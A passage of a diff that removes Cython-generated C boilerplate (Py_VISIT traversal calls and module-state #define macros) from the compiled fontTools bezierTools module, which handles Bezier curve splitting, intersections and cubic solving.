Py_VISIT(traverse_module_state->__pyx_n_u_curveCurveIntersections); - Py_VISIT(traverse_module_state->__pyx_kp_u_curveCurveIntersections_line_137); - Py_VISIT(traverse_module_state->__pyx_n_s_curveLineIntersections); - Py_VISIT(traverse_module_state->__pyx_n_u_curveLineIntersections); - Py_VISIT(traverse_module_state->__pyx_kp_u_curveLineIntersections_line_1248); - Py_VISIT(traverse_module_state->__pyx_n_s_curve_bounds); - Py_VISIT(traverse_module_state->__pyx_n_s_curve_curve_intersections_t); - Py_VISIT(traverse_module_state->__pyx_n_s_curve_curve_intersections_t_loc); - Py_VISIT(traverse_module_state->__pyx_n_s_curve_curve_intersections_t_loc_2); - Py_VISIT(traverse_module_state->__pyx_n_s_curve_line_intersections_t); - Py_VISIT(traverse_module_state->__pyx_n_s_curve_line_intersections_t_loca); - Py_VISIT(traverse_module_state->__pyx_n_s_cx); - Py_VISIT(traverse_module_state->__pyx_n_s_cy); - Py_VISIT(traverse_module_state->__pyx_n_s_cython); - Py_VISIT(traverse_module_state->__pyx_n_s_d); - Py_VISIT(traverse_module_state->__pyx_n_s_d0); - Py_VISIT(traverse_module_state->__pyx_n_s_d1); - Py_VISIT(traverse_module_state->__pyx_n_s_d1x); - Py_VISIT(traverse_module_state->__pyx_n_s_d1y); - Py_VISIT(traverse_module_state->__pyx_n_s_delta); - Py_VISIT(traverse_module_state->__pyx_n_s_delta_2); - Py_VISIT(traverse_module_state->__pyx_n_s_delta_3); - Py_VISIT(traverse_module_state->__pyx_n_s_deriv3); - Py_VISIT(traverse_module_state->__pyx_kp_u_disable); - Py_VISIT(traverse_module_state->__pyx_n_s_doctest); - Py_VISIT(traverse_module_state->__pyx_n_s_dx); - Py_VISIT(traverse_module_state->__pyx_n_s_dy); - Py_VISIT(traverse_module_state->__pyx_n_s_e); - Py_VISIT(traverse_module_state->__pyx_n_s_e1); - Py_VISIT(traverse_module_state->__pyx_n_s_e1x); - Py_VISIT(traverse_module_state->__pyx_n_s_e1y); - Py_VISIT(traverse_module_state->__pyx_n_s_e2); - Py_VISIT(traverse_module_state->__pyx_n_s_e2x); - Py_VISIT(traverse_module_state->__pyx_n_s_e2y); - Py_VISIT(traverse_module_state->__pyx_kp_u_enable); - Py_VISIT(traverse_module_state->__pyx_n_s_end); - Py_VISIT(traverse_module_state->__pyx_n_s_epsilon); - Py_VISIT(traverse_module_state->__pyx_n_s_epsilonDigits); - Py_VISIT(traverse_module_state->__pyx_n_s_ex); - Py_VISIT(traverse_module_state->__pyx_n_s_exit); - Py_VISIT(traverse_module_state->__pyx_n_s_ey); - Py_VISIT(traverse_module_state->__pyx_n_s_failed); - Py_VISIT(traverse_module_state->__pyx_n_s_fontTools_misc); - Py_VISIT(traverse_module_state->__pyx_n_s_fontTools_misc_arrayTools); - Py_VISIT(traverse_module_state->__pyx_n_s_fontTools_misc_bezierTools); - Py_VISIT(traverse_module_state->__pyx_n_s_fontTools_misc_transform); - Py_VISIT(traverse_module_state->__pyx_n_s_found); - Py_VISIT(traverse_module_state->__pyx_kp_u_g); - Py_VISIT(traverse_module_state->__pyx_kp_u_gc); - Py_VISIT(traverse_module_state->__pyx_n_s_genexpr); - Py_VISIT(traverse_module_state->__pyx_n_s_i); - Py_VISIT(traverse_module_state->__pyx_n_s_import); - Py_VISIT(traverse_module_state->__pyx_n_s_initializing); - Py_VISIT(traverse_module_state->__pyx_n_s_insert); - Py_VISIT(traverse_module_state->__pyx_n_s_intersection_ts); - Py_VISIT(traverse_module_state->__pyx_n_s_intersections); - Py_VISIT(traverse_module_state->__pyx_n_s_intersects); - Py_VISIT(traverse_module_state->__pyx_n_s_isHorizontal); - Py_VISIT(traverse_module_state->__pyx_n_s_is_coroutine); - Py_VISIT(traverse_module_state->__pyx_n_s_isclose); - Py_VISIT(traverse_module_state->__pyx_kp_u_isenabled); - Py_VISIT(traverse_module_state->__pyx_n_s_it); - Py_VISIT(traverse_module_state->__pyx_n_s_key); - Py_VISIT(traverse_module_state->__pyx_n_s_line); - Py_VISIT(traverse_module_state->__pyx_n_s_lineLineIntersections); - Py_VISIT(traverse_module_state->__pyx_n_u_lineLineIntersections); - Py_VISIT(traverse_module_state->__pyx_kp_u_lineLineIntersections_line_1147); - Py_VISIT(traverse_module_state->__pyx_n_s_linePointAtT); - Py_VISIT(traverse_module_state->__pyx_n_u_linePointAtT); - Py_VISIT(traverse_module_state->__pyx_n_s_line_t); - Py_VISIT(traverse_module_state->__pyx_n_s_line_t_of_pt); - Py_VISIT(traverse_module_state->__pyx_n_s_main); - Py_VISIT(traverse_module_state->__pyx_n_u_main); - Py_VISIT(traverse_module_state->__pyx_n_s_math); - Py_VISIT(traverse_module_state->__pyx_n_s_mid); - Py_VISIT(traverse_module_state->__pyx_n_s_midPt); - Py_VISIT(traverse_module_state->__pyx_n_s_midpoint); - Py_VISIT(traverse_module_state->__pyx_n_s_mult); - Py_VISIT(traverse_module_state->__pyx_n_s_n); - Py_VISIT(traverse_module_state->__pyx_n_s_name); - Py_VISIT(traverse_module_state->__pyx_n_s_namedtuple); - Py_VISIT(traverse_module_state->__pyx_n_s_obj); - Py_VISIT(traverse_module_state->__pyx_n_s_off1); - Py_VISIT(traverse_module_state->__pyx_n_s_off2); - Py_VISIT(traverse_module_state->__pyx_n_s_one); - Py_VISIT(traverse_module_state->__pyx_n_s_origDist); - Py_VISIT(traverse_module_state->__pyx_n_s_origin); - Py_VISIT(traverse_module_state->__pyx_n_s_p0); - Py_VISIT(traverse_module_state->__pyx_n_s_p1); - Py_VISIT(traverse_module_state->__pyx_n_s_p2); - Py_VISIT(traverse_module_state->__pyx_n_s_p3); - Py_VISIT(traverse_module_state->__pyx_n_s_pi); - Py_VISIT(traverse_module_state->__pyx_n_s_pointAtT); - Py_VISIT(traverse_module_state->__pyx_n_s_pointFinder); - Py_VISIT(traverse_module_state->__pyx_n_s_points); - Py_VISIT(traverse_module_state->__pyx_n_s_precision); - Py_VISIT(traverse_module_state->__pyx_n_s_print); - Py_VISIT(traverse_module_state->__pyx_n_s_printSegments); - Py_VISIT(traverse_module_state->__pyx_n_s_pt); - Py_VISIT(traverse_module_state->__pyx_n_u_pt); - Py_VISIT(traverse_module_state->__pyx_n_s_pt1); - Py_VISIT(traverse_module_state->__pyx_n_s_pt1x); - Py_VISIT(traverse_module_state->__pyx_n_s_pt1y); - Py_VISIT(traverse_module_state->__pyx_n_s_pt2); - Py_VISIT(traverse_module_state->__pyx_n_s_pt2x); - Py_VISIT(traverse_module_state->__pyx_n_s_pt2y); - Py_VISIT(traverse_module_state->__pyx_n_s_pt3); - Py_VISIT(traverse_module_state->__pyx_n_s_pt4); - Py_VISIT(traverse_module_state->__pyx_n_s_px); - Py_VISIT(traverse_module_state->__pyx_n_s_py); - Py_VISIT(traverse_module_state->__pyx_n_s_quadraticPointAtT); - Py_VISIT(traverse_module_state->__pyx_n_u_quadraticPointAtT); - Py_VISIT(traverse_module_state->__pyx_n_s_r); - Py_VISIT(traverse_module_state->__pyx_n_s_rDD); - Py_VISIT(traverse_module_state->__pyx_n_s_rQ2); - Py_VISIT(traverse_module_state->__pyx_n_s_range); - Py_VISIT(traverse_module_state->__pyx_n_s_range1); - Py_VISIT(traverse_module_state->__pyx_n_s_range2); - Py_VISIT(traverse_module_state->__pyx_n_s_rectArea); - Py_VISIT(traverse_module_state->__pyx_n_s_roots); - Py_VISIT(traverse_module_state->__pyx_n_s_rotate); - Py_VISIT(traverse_module_state->__pyx_n_s_round); - Py_VISIT(traverse_module_state->__pyx_n_s_s); - Py_VISIT(traverse_module_state->__pyx_n_s_s1); - Py_VISIT(traverse_module_state->__pyx_n_s_s1x); - Py_VISIT(traverse_module_state->__pyx_n_s_s1y); - Py_VISIT(traverse_module_state->__pyx_n_s_s2); - Py_VISIT(traverse_module_state->__pyx_n_s_s2x); - Py_VISIT(traverse_module_state->__pyx_n_s_s2y); - Py_VISIT(traverse_module_state->__pyx_kp_u_s_2); - Py_VISIT(traverse_module_state->__pyx_n_s_scale); - Py_VISIT(traverse_module_state->__pyx_n_s_sectRect); - Py_VISIT(traverse_module_state->__pyx_n_s_seen); - Py_VISIT(traverse_module_state->__pyx_n_s_seg); - Py_VISIT(traverse_module_state->__pyx_n_s_seg1); - Py_VISIT(traverse_module_state->__pyx_n_s_seg2); - Py_VISIT(traverse_module_state->__pyx_n_s_segment); - Py_VISIT(traverse_module_state->__pyx_n_s_segmentPointAtT); - Py_VISIT(traverse_module_state->__pyx_n_u_segmentPointAtT); - Py_VISIT(traverse_module_state->__pyx_n_s_segmentSegmentIntersections); - Py_VISIT(traverse_module_state->__pyx_n_u_segmentSegmentIntersections); - Py_VISIT(traverse_module_state->__pyx_kp_u_segmentSegmentIntersections_line); - Py_VISIT(traverse_module_state->__pyx_n_s_segmentrepr); - Py_VISIT(traverse_module_state->__pyx_kp_u_segmentrepr_1_2_3_2_3_4_0_1_2); - Py_VISIT(traverse_module_state->__pyx_kp_u_segmentrepr_line_1449); - Py_VISIT(traverse_module_state->__pyx_n_s_segmentrepr_locals_genexpr); - Py_VISIT(traverse_module_state->__pyx_n_s_segments); - Py_VISIT(traverse_module_state->__pyx_n_s_send); - Py_VISIT(traverse_module_state->__pyx_n_s_slope12); - Py_VISIT(traverse_module_state->__pyx_n_s_slope34); - Py_VISIT(traverse_module_state->__pyx_n_s_solutions); - Py_VISIT(traverse_module_state->__pyx_n_s_solveCubic); - Py_VISIT(traverse_module_state->__pyx_n_u_solveCubic); - Py_VISIT(traverse_module_state->__pyx_kp_u_solveCubic_line_841); - Py_VISIT(traverse_module_state->__pyx_n_s_solveQuadratic); - Py_VISIT(traverse_module_state->__pyx_n_u_solveQuadratic); - Py_VISIT(traverse_module_state->__pyx_n_s_spec); - Py_VISIT(traverse_module_state->__pyx_n_s_splitCubic); - Py_VISIT(traverse_module_state->__pyx_n_u_splitCubic); - Py_VISIT(traverse_module_state->__pyx_n_s_splitCubicAtT); - Py_VISIT(traverse_module_state->__pyx_n_s_splitCubicAtTC); - Py_VISIT(traverse_module_state->__pyx_n_u_splitCubicAtTC); - Py_VISIT(traverse_module_state->__pyx_n_s_splitCubicAtTC_2); - Py_VISIT(traverse_module_state->__pyx_n_s_splitCubicAtT_2); - Py_VISIT(traverse_module_state->__pyx_n_u_splitCubicAtT_2); - Py_VISIT(traverse_module_state->__pyx_kp_u_splitCubicAtT_line_613); - Py_VISIT(traverse_module_state->__pyx_n_s_splitCubicIntoTwoAtTC); - Py_VISIT(traverse_module_state->__pyx_n_u_splitCubicIntoTwoAtTC); - Py_VISIT(traverse_module_state->__pyx_kp_u_splitCubic_line_552); - Py_VISIT(traverse_module_state->__pyx_n_s_splitCubic_locals_genexpr); - Py_VISIT(traverse_module_state->__pyx_n_s_splitLine); - Py_VISIT(traverse_module_state->__pyx_n_u_splitLine); - Py_VISIT(traverse_module_state->__pyx_kp_u_splitLine_line_450); - Py_VISIT(traverse_module_state->__pyx_n_s_splitQuadratic); - Py_VISIT(traverse_module_state->__pyx_n_u_splitQuadratic); - Py_VISIT(traverse_module_state->__pyx_n_s_splitQuadraticAtT); - Py_VISIT(traverse_module_state->__pyx_n_s_splitQuadraticAtT_2); - Py_VISIT(traverse_module_state->__pyx_n_u_splitQuadraticAtT_2); - Py_VISIT(traverse_module_state->__pyx_kp_u_splitQuadraticAtT_line_589); - Py_VISIT(traverse_module_state->__pyx_kp_u_splitQuadratic_line_507); - Py_VISIT(traverse_module_state->__pyx_n_s_splitQuadratic_locals_genexpr); - Py_VISIT(traverse_module_state->__pyx_n_s_split_cubic_into_two); - Py_VISIT(traverse_module_state->__pyx_n_s_split_segment_at_t); - Py_VISIT(traverse_module_state->__pyx_n_s_sqrt); - Py_VISIT(traverse_module_state->__pyx_n_s_start); - Py_VISIT(traverse_module_state->__pyx_n_s_swapped); - Py_VISIT(traverse_module_state->__pyx_n_s_sx); - Py_VISIT(traverse_module_state->__pyx_n_s_sy); - Py_VISIT(traverse_module_state->__pyx_n_s_sys); - Py_VISIT(traverse_module_state->__pyx_n_s_t); - Py_VISIT(traverse_module_state->__pyx_n_s_t1); - Py_VISIT(traverse_module_state->__pyx_n_u_t1); - Py_VISIT(traverse_module_state->__pyx_n_s_t1_2); - Py_VISIT(traverse_module_state->__pyx_n_s_t1_3); - Py_VISIT(traverse_module_state->__pyx_n_s_t2); - Py_VISIT(traverse_module_state->__pyx_n_u_t2); - Py_VISIT(traverse_module_state->__pyx_n_s_test); - Py_VISIT(traverse_module_state->__pyx_n_s_testmod); - Py_VISIT(traverse_module_state->__pyx_n_s_theta); - Py_VISIT(traverse_module_state->__pyx_n_s_throw); - Py_VISIT(traverse_module_state->__pyx_n_s_tolerance); - Py_VISIT(traverse_module_state->__pyx_n_s_transformPoints); - Py_VISIT(traverse_module_state->__pyx_n_s_translate); - Py_VISIT(traverse_module_state->__pyx_n_s_ts); - Py_VISIT(traverse_module_state->__pyx_n_s_two); - Py_VISIT(traverse_module_state->__pyx_n_s_unique_key); - Py_VISIT(traverse_module_state->__pyx_n_s_unique_values); - Py_VISIT(traverse_module_state->__pyx_n_s_v0); - Py_VISIT(traverse_module_state->__pyx_n_s_v1); - Py_VISIT(traverse_module_state->__pyx_n_s_v2); - Py_VISIT(traverse_module_state->__pyx_n_s_v3); - Py_VISIT(traverse_module_state->__pyx_n_s_v4); - Py_VISIT(traverse_module_state->__pyx_n_s_where); - Py_VISIT(traverse_module_state->__pyx_n_s_x); - Py_VISIT(traverse_module_state->__pyx_n_s_x0); - Py_VISIT(traverse_module_state->__pyx_n_s_x1); - Py_VISIT(traverse_module_state->__pyx_n_s_x2); - Py_VISIT(traverse_module_state->__pyx_n_s_x3); - Py_VISIT(traverse_module_state->__pyx_n_s_x4); - Py_VISIT(traverse_module_state->__pyx_n_s_xDiff); - Py_VISIT(traverse_module_state->__pyx_n_s_xRoots); - Py_VISIT(traverse_module_state->__pyx_n_s_y); - Py_VISIT(traverse_module_state->__pyx_n_s_y1); - Py_VISIT(traverse_module_state->__pyx_n_s_y2); - Py_VISIT(traverse_module_state->__pyx_n_s_y3); - Py_VISIT(traverse_module_state->__pyx_n_s_y4); - Py_VISIT(traverse_module_state->__pyx_n_s_yDiff); - Py_VISIT(traverse_module_state->__pyx_n_s_yRoots); - Py_VISIT(traverse_module_state->__pyx_float_0_0); - Py_VISIT(traverse_module_state->__pyx_float_0_5); - Py_VISIT(traverse_module_state->__pyx_float_1_0); - Py_VISIT(traverse_module_state->__pyx_float_2_0); - Py_VISIT(traverse_module_state->__pyx_float_3_0); - Py_VISIT(traverse_module_state->__pyx_float_4_0); - Py_VISIT(traverse_module_state->__pyx_float_9_0); - Py_VISIT(traverse_module_state->__pyx_float_1eneg_3); - Py_VISIT(traverse_module_state->__pyx_float_27_0); - Py_VISIT(traverse_module_state->__pyx_float_54_0); - Py_VISIT(traverse_module_state->__pyx_float_0_005); - Py_VISIT(traverse_module_state->__pyx_float_0_125); - Py_VISIT(traverse_module_state->__pyx_float_1eneg_10); - Py_VISIT(traverse_module_state->__pyx_float_neg_2_0); - Py_VISIT(traverse_module_state->__pyx_int_0); - Py_VISIT(traverse_module_state->__pyx_int_1); - Py_VISIT(traverse_module_state->__pyx_int_2); - Py_VISIT(traverse_module_state->__pyx_int_3); - Py_VISIT(traverse_module_state->__pyx_int_6); - Py_VISIT(traverse_module_state->__pyx_int_neg_1); - Py_VISIT(traverse_module_state->__pyx_codeobj_); - Py_VISIT(traverse_module_state->__pyx_tuple__2); - Py_VISIT(traverse_module_state->__pyx_tuple__4); - Py_VISIT(traverse_module_state->__pyx_tuple__5); - Py_VISIT(traverse_module_state->__pyx_tuple__6); - Py_VISIT(traverse_module_state->__pyx_tuple__8); - Py_VISIT(traverse_module_state->__pyx_tuple__12); - Py_VISIT(traverse_module_state->__pyx_tuple__14); - Py_VISIT(traverse_module_state->__pyx_tuple__15); - Py_VISIT(traverse_module_state->__pyx_tuple__17); - Py_VISIT(traverse_module_state->__pyx_tuple__19); - Py_VISIT(traverse_module_state->__pyx_tuple__21); - Py_VISIT(traverse_module_state->__pyx_tuple__23); - Py_VISIT(traverse_module_state->__pyx_tuple__26); - Py_VISIT(traverse_module_state->__pyx_tuple__28); - Py_VISIT(traverse_module_state->__pyx_tuple__30); - Py_VISIT(traverse_module_state->__pyx_tuple__32); - Py_VISIT(traverse_module_state->__pyx_tuple__34); - Py_VISIT(traverse_module_state->__pyx_tuple__36); - Py_VISIT(traverse_module_state->__pyx_tuple__38); - Py_VISIT(traverse_module_state->__pyx_tuple__40); - Py_VISIT(traverse_module_state->__pyx_tuple__42); - Py_VISIT(traverse_module_state->__pyx_tuple__44); - Py_VISIT(traverse_module_state->__pyx_tuple__46); - Py_VISIT(traverse_module_state->__pyx_tuple__48); - Py_VISIT(traverse_module_state->__pyx_tuple__50); - Py_VISIT(traverse_module_state->__pyx_tuple__52); - Py_VISIT(traverse_module_state->__pyx_tuple__53); - Py_VISIT(traverse_module_state->__pyx_tuple__55); - Py_VISIT(traverse_module_state->__pyx_tuple__57); - Py_VISIT(traverse_module_state->__pyx_tuple__59); - Py_VISIT(traverse_module_state->__pyx_tuple__61); - Py_VISIT(traverse_module_state->__pyx_tuple__63); - Py_VISIT(traverse_module_state->__pyx_tuple__65); - Py_VISIT(traverse_module_state->__pyx_tuple__67); - Py_VISIT(traverse_module_state->__pyx_tuple__69); - Py_VISIT(traverse_module_state->__pyx_tuple__71); - Py_VISIT(traverse_module_state->__pyx_tuple__73); - Py_VISIT(traverse_module_state->__pyx_tuple__75); - Py_VISIT(traverse_module_state->__pyx_tuple__77); - Py_VISIT(traverse_module_state->__pyx_tuple__79); - Py_VISIT(traverse_module_state->__pyx_tuple__81); - Py_VISIT(traverse_module_state->__pyx_tuple__83); - Py_VISIT(traverse_module_state->__pyx_tuple__85); - Py_VISIT(traverse_module_state->__pyx_tuple__87); - Py_VISIT(traverse_module_state->__pyx_tuple__89); - Py_VISIT(traverse_module_state->__pyx_tuple__92); - Py_VISIT(traverse_module_state->__pyx_tuple__94); - Py_VISIT(traverse_module_state->__pyx_tuple__95); - Py_VISIT(traverse_module_state->__pyx_tuple__97); - Py_VISIT(traverse_module_state->__pyx_tuple__99); - Py_VISIT(traverse_module_state->__pyx_codeobj__3); - Py_VISIT(traverse_module_state->__pyx_codeobj__7); - Py_VISIT(traverse_module_state->__pyx_tuple__101); - Py_VISIT(traverse_module_state->__pyx_codeobj__13); - Py_VISIT(traverse_module_state->__pyx_codeobj__16); - Py_VISIT(traverse_module_state->__pyx_codeobj__18); - Py_VISIT(traverse_module_state->__pyx_codeobj__20); - Py_VISIT(traverse_module_state->__pyx_codeobj__22); - Py_VISIT(traverse_module_state->__pyx_codeobj__24); - Py_VISIT(traverse_module_state->__pyx_codeobj__25); - Py_VISIT(traverse_module_state->__pyx_codeobj__27); - Py_VISIT(traverse_module_state->__pyx_codeobj__29); - Py_VISIT(traverse_module_state->__pyx_codeobj__31); - Py_VISIT(traverse_module_state->__pyx_codeobj__33); - Py_VISIT(traverse_module_state->__pyx_codeobj__35); - Py_VISIT(traverse_module_state->__pyx_codeobj__37); - Py_VISIT(traverse_module_state->__pyx_codeobj__39); - Py_VISIT(traverse_module_state->__pyx_codeobj__41); - Py_VISIT(traverse_module_state->__pyx_codeobj__43); - Py_VISIT(traverse_module_state->__pyx_codeobj__45); - Py_VISIT(traverse_module_state->__pyx_codeobj__47); - Py_VISIT(traverse_module_state->__pyx_codeobj__49); - Py_VISIT(traverse_module_state->__pyx_codeobj__51); - Py_VISIT(traverse_module_state->__pyx_codeobj__54); - Py_VISIT(traverse_module_state->__pyx_codeobj__56); - Py_VISIT(traverse_module_state->__pyx_codeobj__58); - Py_VISIT(traverse_module_state->__pyx_codeobj__60); - Py_VISIT(traverse_module_state->__pyx_codeobj__62); - Py_VISIT(traverse_module_state->__pyx_codeobj__64); - Py_VISIT(traverse_module_state->__pyx_codeobj__66); - Py_VISIT(traverse_module_state->__pyx_codeobj__68); - Py_VISIT(traverse_module_state->__pyx_codeobj__70); - Py_VISIT(traverse_module_state->__pyx_codeobj__72); - Py_VISIT(traverse_module_state->__pyx_codeobj__74); - Py_VISIT(traverse_module_state->__pyx_codeobj__76); - Py_VISIT(traverse_module_state->__pyx_codeobj__78); - Py_VISIT(traverse_module_state->__pyx_codeobj__80); - Py_VISIT(traverse_module_state->__pyx_codeobj__82); - Py_VISIT(traverse_module_state->__pyx_codeobj__84); - Py_VISIT(traverse_module_state->__pyx_codeobj__86); - Py_VISIT(traverse_module_state->__pyx_codeobj__88); - Py_VISIT(traverse_module_state->__pyx_codeobj__90); - Py_VISIT(traverse_module_state->__pyx_codeobj__93); - Py_VISIT(traverse_module_state->__pyx_codeobj__96); - Py_VISIT(traverse_module_state->__pyx_codeobj__98); - Py_VISIT(traverse_module_state->__pyx_codeobj__100); - Py_VISIT(traverse_module_state->__pyx_codeobj__102); - return 0; -} -#endif -/* #### Code section: module_state_defines ### */ -#define __pyx_d __pyx_mstate_global->__pyx_d -#define __pyx_b __pyx_mstate_global->__pyx_b -#define __pyx_cython_runtime __pyx_mstate_global->__pyx_cython_runtime -#define __pyx_empty_tuple __pyx_mstate_global->__pyx_empty_tuple -#define __pyx_empty_bytes __pyx_mstate_global->__pyx_empty_bytes -#define __pyx_empty_unicode __pyx_mstate_global->__pyx_empty_unicode -#ifdef __Pyx_CyFunction_USED -#define __pyx_CyFunctionType __pyx_mstate_global->__pyx_CyFunctionType -#endif -#ifdef __Pyx_FusedFunction_USED -#define __pyx_FusedFunctionType __pyx_mstate_global->__pyx_FusedFunctionType -#endif -#ifdef __Pyx_Generator_USED -#define __pyx_GeneratorType __pyx_mstate_global->__pyx_GeneratorType -#endif -#ifdef __Pyx_IterableCoroutine_USED -#define __pyx_IterableCoroutineType __pyx_mstate_global->__pyx_IterableCoroutineType -#endif -#ifdef __Pyx_Coroutine_USED -#define __pyx_CoroutineAwaitType __pyx_mstate_global->__pyx_CoroutineAwaitType -#endif -#ifdef __Pyx_Coroutine_USED -#define __pyx_CoroutineType __pyx_mstate_global->__pyx_CoroutineType -#endif -#if CYTHON_USE_MODULE_STATE -#endif -#if CYTHON_USE_MODULE_STATE -#define __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr __pyx_mstate_global->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr -#define __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr __pyx_mstate_global->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr -#define __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC __pyx_mstate_global->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC -#define __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC __pyx_mstate_global->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC -#define __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr __pyx_mstate_global->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr -#define __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t __pyx_mstate_global->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t -#define __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr __pyx_mstate_global->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr -#endif -#define __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr __pyx_mstate_global->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr -#define __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr __pyx_mstate_global->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr -#define __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC __pyx_mstate_global->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC -#define __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC __pyx_mstate_global->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC -#define __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr __pyx_mstate_global->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr -#define __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t __pyx_mstate_global->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t -#define __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr __pyx_mstate_global->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr -#define __pyx_n_s_1_t __pyx_mstate_global->__pyx_n_s_1_t -#define __pyx_n_s_1_t_2 __pyx_mstate_global->__pyx_n_s_1_t_2 -#define __pyx_n_s_2_t_1_t __pyx_mstate_global->__pyx_n_s_2_t_1_t -#define __pyx_kp_u_Approximates_the_arc_length_for __pyx_mstate_global->__pyx_kp_u_Approximates_the_arc_length_for -#define __pyx_n_s_AttributeError __pyx_mstate_global->__pyx_n_s_AttributeError -#define __pyx_n_s_COMPILED __pyx_mstate_global->__pyx_n_s_COMPILED -#define __pyx_kp_u_Calculates_the_arc_length_for_a __pyx_mstate_global->__pyx_kp_u_Calculates_the_arc_length_for_a -#define __pyx_kp_u_Calculates_the_bounding_rectangl __pyx_mstate_global->__pyx_kp_u_Calculates_the_bounding_rectangl -#define __pyx_kp_u_Calculates_the_bounding_rectangl_2 __pyx_mstate_global->__pyx_kp_u_Calculates_the_bounding_rectangl_2 -#define __pyx_kp_u_Couldn_t_work_out_which_intersec __pyx_mstate_global->__pyx_kp_u_Couldn_t_work_out_which_intersec -#define __pyx_n_s_DD __pyx_mstate_global->__pyx_n_s_DD -#define __pyx_kp_u_Finds_intersections_between_a_cu __pyx_mstate_global->__pyx_kp_u_Finds_intersections_between_a_cu -#define __pyx_kp_u_Finds_intersections_between_a_cu_2 __pyx_mstate_global->__pyx_kp_u_Finds_intersections_between_a_cu_2 -#define __pyx_kp_u_Finds_intersections_between_two __pyx_mstate_global->__pyx_kp_u_Finds_intersections_between_two -#define __pyx_kp_u_Finds_intersections_between_two_2 __pyx_mstate_global->__pyx_kp_u_Finds_intersections_between_two_2 -#define __pyx_n_s_Identity __pyx_mstate_global->__pyx_n_s_Identity -#define __pyx_n_s_ImportError __pyx_mstate_global->__pyx_n_s_ImportError -#define __pyx_n_s_Intersection __pyx_mstate_global->__pyx_n_s_Intersection -#define __pyx_n_u_Intersection __pyx_mstate_global->__pyx_n_u_Intersection -#define __pyx_n_s_Len __pyx_mstate_global->__pyx_n_s_Len -#define __pyx_kp_s_Lib_fontTools_misc_bezierTools_p __pyx_mstate_global->__pyx_kp_s_Lib_fontTools_misc_bezierTools_p -#define __pyx_n_s_Q __pyx_mstate_global->__pyx_n_s_Q -#define __pyx_n_s_Q3 __pyx_mstate_global->__pyx_n_s_Q3 -#define __pyx_n_s_R __pyx_mstate_global->__pyx_n_s_R -#define __pyx_n_s_R2 __pyx_mstate_global->__pyx_n_s_R2 -#define __pyx_n_s_R2_Q3 __pyx_mstate_global->__pyx_n_s_R2_Q3 -#define __pyx_kp_u_Solve_a_cubic_equation_Solves_a __pyx_mstate_global->__pyx_kp_u_Solve_a_cubic_equation_Solves_a -#define __pyx_kp_u_Split_a_cubic_Bezier_curve_at_a __pyx_mstate_global->__pyx_kp_u_Split_a_cubic_Bezier_curve_at_a -#define __pyx_kp_u_Split_a_cubic_Bezier_curve_at_on __pyx_mstate_global->__pyx_kp_u_Split_a_cubic_Bezier_curve_at_on -#define __pyx_kp_u_Split_a_line_at_a_given_coordina __pyx_mstate_global->__pyx_kp_u_Split_a_line_at_a_given_coordina -#define __pyx_kp_u_Split_a_quadratic_Bezier_curve_a __pyx_mstate_global->__pyx_kp_u_Split_a_quadratic_Bezier_curve_a -#define __pyx_kp_u_Split_a_quadratic_Bezier_curve_a_2 __pyx_mstate_global->__pyx_kp_u_Split_a_quadratic_Bezier_curve_a_2 -#define __pyx_n_s_TypeError __pyx_mstate_global->__pyx_n_s_TypeError -#define __pyx_kp_u_Unknown_curve_degree __pyx_mstate_global->__pyx_kp_u_Unknown_curve_degree -#define __pyx_n_s_ValueError __pyx_mstate_global->__pyx_n_s_ValueError -#define __pyx_kp_u__10 __pyx_mstate_global->__pyx_kp_u__10 -#define __pyx_n_s__103 __pyx_mstate_global->__pyx_n_s__103 -#define __pyx_n_s__11 __pyx_mstate_global->__pyx_n_s__11 -#define __pyx_kp_u__9 __pyx_mstate_global->__pyx_kp_u__9 -#define __pyx_n_s__91 __pyx_mstate_global->__pyx_n_s__91 -#define __pyx_n_s_a __pyx_mstate_global->__pyx_n_s_a -#define __pyx_n_s_a1 __pyx_mstate_global->__pyx_n_s_a1 -#define __pyx_n_s_a1_3 __pyx_mstate_global->__pyx_n_s_a1_3 -#define __pyx_n_s_a1x __pyx_mstate_global->__pyx_n_s_a1x -#define __pyx_n_s_a1y __pyx_mstate_global->__pyx_n_s_a1y -#define __pyx_n_s_a2 __pyx_mstate_global->__pyx_n_s_a2 -#define __pyx_n_s_a3 __pyx_mstate_global->__pyx_n_s_a3 -#define __pyx_n_s_acos __pyx_mstate_global->__pyx_n_s_acos -#define __pyx_n_s_aligned_curve __pyx_mstate_global->__pyx_n_s_aligned_curve -#define 